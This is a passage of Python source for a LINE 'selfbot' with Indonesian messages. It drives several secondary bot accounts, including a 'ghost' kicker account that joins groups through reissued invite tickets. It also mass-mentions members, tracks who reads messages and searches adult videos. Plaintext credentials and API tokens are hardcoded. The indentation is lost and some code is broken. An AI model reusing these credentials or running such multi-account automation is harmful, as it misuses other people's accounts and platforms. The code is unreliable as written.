cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Grup "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["foto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "cvp":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["video"][mid] = True
cl.sendText(msg.to,"Kirim videonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["foto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["foto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["foto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["foto"][Dmid] = True
km.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot5up":
if msg._from in admin:
Setmain["foto"][Emid] = True
kb.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot6up":
if msg._from in admin:
Setmain["foto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot4name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = km.getProfile()
profile.displayName = string
km.updateProfile(profile)
km.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot5name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kb.getProfile()
profile.displayName = string
kb.updateProfile(profile)
kb.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("botkicker: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == 'tagall':
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, jml = [], [], [], [], len(nama)
if jml <= 100:
mentionMembers(msg.to, nama)
if jml > 100 and jml < 200:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, 399):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (400, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
elif 'mentionall' in msg.text:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
k = len(nama)//20
for a in range(k+0):
txt = ''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append({"S":str(s), "E" :str(s+6), "M":i.mid})
s += 7
txt += '@Alin \n'
cl.sendMessage(to, text=txt, contentMetadata={'MENTION': json.dumps({'MENTIONEES':b})}, contentType=0)
cl.sendMessage(to, "jumlah {} orang".format(str(len(nama))))
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar User Bot 」\n\n"+ma+"\nTotal「%s」List Bots" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
a = a + 1
end = '\n'
mb += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
a = a + 1
end = '\n'
mc += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar Admin 」\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」Pengguna Selfbot" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
me = ""
a = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
a = a + 1
end = '\n'
mb += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
a = a + 1
end = '\n'
md += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
a = a + 1
end = '\n'
mc += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectinvite
for group in gid:
a = a + 1
end = '\n'
me += str(a) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"「 Daftar Protection 」\n\n「✭」 PROTECT URL :\n"+ma+"\n「✭」 PROTECT KICK :\n"+mb+"\n「✭」 PROTECT JOIN :\n"+md+"\n「✭」 PROTECT CANCEL:\n"+mc+"\n「✭」 PROTECT INVITE:\n"+me+"\nTotal「%s」Grup diamankan" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel)+len(protectinvite))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「Ready」 ", "")
sendMention1(msg.to, sender, "「Ready」 ", "")
sendMention2(msg.to, sender, "「Ready」 ", "")
sendMention3(msg.to, sender, "「Ready」 ", "")
sendMention4(msg.to, sender, "「Ready」 ", "")
sendMention5(msg.to, sender, "「Ready」 ", "")
elif cmd == "joinall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kb.getGroup(msg.to)
G.preventedJoinByTicket = True
kb.updateGroup(G)
elif cmd == "byeall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
sendMention1(msg.to, sender, "「Bye bye」 ", " 「Jangan Lupa Invite lg」")
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
km.leaveGroup(msg.to)
kb.leaveGroup(msg.to)
elif cmd == ".bye":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "「Maaf Bot Di Paksa Keluar」")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "no1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "no2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "no3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "no4":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
G = km.getGroup(msg.to)
G.preventedJoinByTicket = True
km.updateGroup(G)
elif cmd == "no5":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kb.getGroup(msg.to)
G.preventedJoinByTicket = True
kb.updateGroup(G)
elif cmd == ".ghost join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = sw.getGroup(msg.to)
G.preventedJoinByTicket = True
sw.updateGroup(G)
elif cmd == ".ghost leave":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.sendText(msg.to, "Bye bye fams "+str(G.name))
sw.leaveGroup(msg.to)
elif cmd == ".rtime":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "「 Respontime 」\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
sendMention(msg.to, sender, "「 Selfbot Speed 」\n• User ", "")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "spbot":
if msg._from in admin:
start = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start
cl.sendText(msg.to, "%s" % (elapsed_time))
start2 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start2
ki.sendText(msg.to, "%s" % (elapsed_time))
start3 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start3
kk.sendText(msg.to, "%s" % (elapsed_time))
start4 = time.time()
sw.sendMessage("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start4
kc.sendText(msg.to, "%s" % (elapsed_time))
start5 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start5
km.sendText(msg.to, "%s" % (elapsed_time))
start6 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start6
kb.sendText(msg.to, "%s" % (elapsed_time))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['readPoint'][msg.to] = msg_id
Setmain['readMember'][msg.to] = {}
cl.sendText(msg.to, "「 Status Lurking 」\nBerhasil diaktifkan, selanjutnya ketik lurkers\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['readPoint'][msg.to]
del Setmain['readMember'][msg.to]
cl.sendText(msg.to, "「 Status Lurking 」\nBerhasil dimatikan\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
elif cmd == "lurkers":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in Setmain['readPoint']:
if Setmain['readMember'][msg.to] != {}:
aa = []
for x in Setmain['readMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " 「 Daftar Member 」 \n\n 「 Total {} Sider 」\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['readPoint'][msg.to]
del Setmain['readMember'][msg.to]
except:
pass
Setmain['readPoint'][msg.to] = msg.id
Setmain['readMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "「 Status Sider 」\nBerhasil diaktifkan\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "「 Status Sider 」\nBerhasil dimatikan\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
elif cmd.startswith("get-audio "):
if msg._from in admin:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " "," ")
cond = query.split("|")
search = str(cond[0])
with requests.session() as web:
web.headers["User-Agent"] = "Mozilla/5.0"
result = web.get("https://farzain.xyz/api/premium/yt_search.php?apikey=apikey_saintsbot&id={}".format(str(search)))
data = result.text
data = json.loads(data)
if len(cond) == 1:
if data["respons"] != []:
num = 0
ret_ = "「 Pencarian Audio 」\n"
for res in data["respons"]:
num += 1
ret_ += "\n {}. {}".format(str(num), str(res['title']))
ret_ += "\n\n Total {} Result".format(str(len(data["respons"])))
cl.sendMessage(msg.to, str(ret_))
cl.sendText(to, "Ketik Get-yt {} | angka\nuntuk melihat detail lagu".format(str(search)))
if len(cond) == 2:
num = int(cond[1])
if num <= len(data["respons"]):
res = data["respons"][num - 1]
with requests.session() as web:
web.headers["User-Agent"] = "Mozilla/5.0"
result = web.get("http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q=https://www.youtube.com/watch?v={}".format(str(res['video_id'])))
data = result.text
data = json.loads(data)
ret_ = "「 Detail Lagu 」\nTitle : "+data['result']['title']
ret_ += "\nLikes : "+str(data['result']['likes'])
ret_ += "\nDislikes : "+str(data['result']['dislikes'])
ret_ += "\nDuration : "+str(data['result']['duration'])
ret_ += "\nRating : "+str(data['result']['rating'])
ret_ += "\nAuthor : "+str(data['result']['author'])+"\n"
cover = data['result']['thumbnail']
if data["result"]["audiolist"] != []:
for koplok in data["result"]["audiolist"]:
ret_ += "\nType : "+koplok['extension']
ret_ += "\nResolusi : "+koplok['resolution']
ret_ += "\nSize : "+koplok['size']
ret_ += "\nLink : "+koplok['url']
if koplok['resolution'] == '50k':
audio = koplok['url']
cl.sendImageWithURL(msg.to,cover)
cl.sendMessage(msg.to, str(ret_))
cl.sendAudioWithURL(msg.to,audio)
elif cmd.startswith("get-fs "):
if msg._from in admin:
sep = msg.text.split(" ")
anu = msg.text.replace(sep[0] + " "," ")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("https://farzain.xyz/api/premium/fs.php?apikey=apikey_saintsbot&id={}".format(urllib.parse.quote(anu)))
data = r.text
data = json.loads(data)
if data["status"] == "success":
ret_ = data["url"]
cl.sendImageWithURL(msg.to,ret_)
else:
cl.sendMessage(msg.to, "Error")
elif cmd.startswith("get-post "):
if msg._from in admin:
sep = msg.text.split(" ")
post = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = s.get("http://m.jancok.com/klik/{}/".format(urllib.parse.quote(post)))
soup = BeautifulSoup(r.content, 'html5lib')
ret_ = '「 Get Postingan 」\n\n'
try:
for title in soup.select("[class~=badge-item-title]"):
ret_ += "• Judul : "+title.get_text()
ret_ += "\n• Link : m.jancok.com"
for link in soup.find_all('img',limit=1):
cl.sendMessage(msg.to, ret_)
cl.sendImageWithURL(msg.to, link.get('src'))
except Exception as e:
cl.sendMessage(msg.to, "Post kosong")
print(str(e))
elif cmd.startswith("get-line "):
if msg._from in admin:
sep = text.split(" ")
user = text.replace(sep[0] + " ","")
conn = cl.findContactsByUserid(user)
try:
anu = conn.mid
dn = conn.displayName
bio = conn.statusMessage
sendMention(to, anu, "「 Contact Line ID 」\n• Nama : ", "\n• Nick : "+dn+"\n• Bio : "+bio+"\n• Contact link : http://line.me/ti/p/~"+user)
cl.sendContact(to, anu)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("invite: "):
if msg._from in admin:
sep = text.split(" ")
idnya = text.replace(sep[0] + " ","")
conn = cl.findContactsByUserid(idnya)
cl.findAndAddContactsByMid(conn.mid)
cl.inviteIntoGroup(msg.to,[conn.mid])
group = cl.getGroup(msg.to)
xname = cl.getContact(conn.mid)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Diinvite 」\nNama contact '
recky = str(xname.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':xname.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan+ zxc + "ke grup " + str(group.name) +""
cl.sendMessage(receiver, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd.startswith("listmeme"):
if msg._from in admin:
proses = text.split(" ")
keyword = text.replace(proses[0] + " ","")
count = keyword.split("|")
search = str(count[0])
r = requests.get("http://api.imgflip.com/get_memes")
data = json.loads(r.text)
if len(count) == 1:
no = 0
hasil = "「 Daftar Meme Image 」\n"
for aa in data["data"]["memes"]:
no += 1
hasil += "\n" + str(no) + ". "+ str(aa["name"])
hasil += " "
ret_ = "\n\nSelanjutnya ketik:\nListmeme | angka\nGet-meme text1 | text2 | angka"
cl.sendText(msg.to,hasil+ret_)
if len(count) == 2:
try:
num = int(count[1])
gambar = data["data"]["memes"][num - 1]
hasil = "{}".format(str(gambar["name"]))
sendMention(msg.to, msg._from,"「 Meme Image 」\nTunggu ","\nFoto sedang diproses...")
cl.sendText(msg.to,hasil)
cl.sendImageWithURL(msg.to,gambar["url"])
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-meme "):
if msg._from in admin:
proses = text.split(" ")
keyword = text.replace(proses[0]+" ","")
query = keyword.split("|")
atas = query[0]
bawah = query[1]
r = requests.get("https://api.imgflip.com/get_memes")
data = json.loads(r.text)
try:
num = int(query[2])
namamem = data["data"]["memes"][num - 1]
meme = int(namamem["id"])
api = pyimgflip.Imgflip(username='andyihsan', password='ihsan848')
result = api.caption_image(meme, atas,bawah)
sendMention(msg.to, msg._from,"「 Meme Image 」\nTunggu ","\nFoto sedang diproses...")
cl.sendImageWithURL(msg.to,result["url"])
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-gif "):
if msg._from in admin:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("|")
search = str(count[0])
r = requests.get("https://api.tenor.com/v1/search?key=PVS5D2UHR0EV&limit=10&q="+str(search))
data = json.loads(r.text)
if len(count) == 1:
no = 0
hasil = "「 Pencarian Gif 」\n"
for aa in data["results"]:
no += 1
hasil += "\n" + str(no) + ". " + str(aa["title"])
ret_ = "\n\nSelanjutnya Get-gif {} | angka\nuntuk melihat detail video".format(str(search))
cl.sendText(msg.to,hasil+ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["results"][num - 1]
c = str(b["id"])
hasil = "Informasi gif ID "+str(c)
hasil += "\n"
cl.sendText(msg.to,hasil)
dl = str(b["media"][0]["loopedmp4"]["url"])
cl.sendVideoWithURL(msg.to,dl)
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-xxx "):
if msg._from in admin:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("|")
search = str(count[0])
r = requests.get("https://api.avgle.com/v1/search/{}/1?limit=10".format(str(search)))
data = json.loads(r.text)
if len(count) == 1:
no = 0
hasil = "「 Pencarian Video 18+ 」\n"
for aa in data["response"]["videos"]:
no += 1
hasil += "\n"+str(no)+". "+str(aa["title"])+"\nDurasi : "+str(aa["duration"])
ret_ = "\n\nSelanjutnya Get-xxx {} | angka\nuntuk melihat detail video".format(str(search))
cl.sendText(msg.to,hasil+ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["response"]["videos"][num - 1]
c = str(b["vid"])
d = requests.get("https://api.avgle.com/v1/video/"+str(c))
data1 = json.loads(d.text)
hasil = "Judul "+str(data1["response"]["video"]["title"])
hasil += "\n\nDurasi : "+str(data1["response"]["video"]["duration"])
hasil += "\nKualitas HD : "+str(data1["response"]["video"]["hd"])
hasil += "\nDitonton "+str(data1["response"]["video"]["viewnumber"])
e = requests.get("https://api-ssl.bitly.com/v3/shorten?access_token=c52a3ad85f0eeafbb55e680d0fb926a5c4cab823&longUrl="+str(data1["response"]["video"]["video_url"]))
data2 = json.loads(e.text)
hasil += "\nLink video : "+str(data1["response"]["video"]["video_url"])
hasil += "\nLink embed : "+str(data1["response"]["video"]["embedded_url"])
hasil += "\n\nKalau tidak bisa jangan lupa pakai vpn kesayangan anda"
cl.sendText(msg.to,hasil)
anuanu = str(data1["response"]["video"]["preview_url"])
path = cl.downloadFileURL(anuanu)
cl.sendImage(msg.to,path)
cl.sendVideoWithURL(msg.to, data["data"]["url"])
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-sholat "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "「 Jadwal Sholat 」\n"
ret_ += "\n「✭」 Lokasi : " + data[0]
ret_ += "\n「✭」 " + data[1]
ret_ += "\n「✭」 " + data[2]
ret_ += "\n「✭」 " + data[3]
ret_ += "\n「✭」 " + data[4]
ret_ += "\n「✭」 " + data[5]
ret_ += "\n\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
ret_ += "\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-cuaca "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "「 Status Cuaca 」\n"
ret_ += "\n「✭」 Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\n「✭」 Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\n「✭」 Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\n「✭」 Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\n「✭」 Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
ret_ += "\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-lokasi "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "「 Info Lokasi 」"
ret_ += "\n「✭」 Location : " + data[0]
ret_ += "\n「✭」 Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik "):
if msg._from in admin:
data = msg.text.lower().replace("lirik ","")
artis = data.split('|')
artis = artis[1].replace(' ','_')
judul = data.split('|')
judul = judul[2].replace(' ','_')
with requests.session() as s:
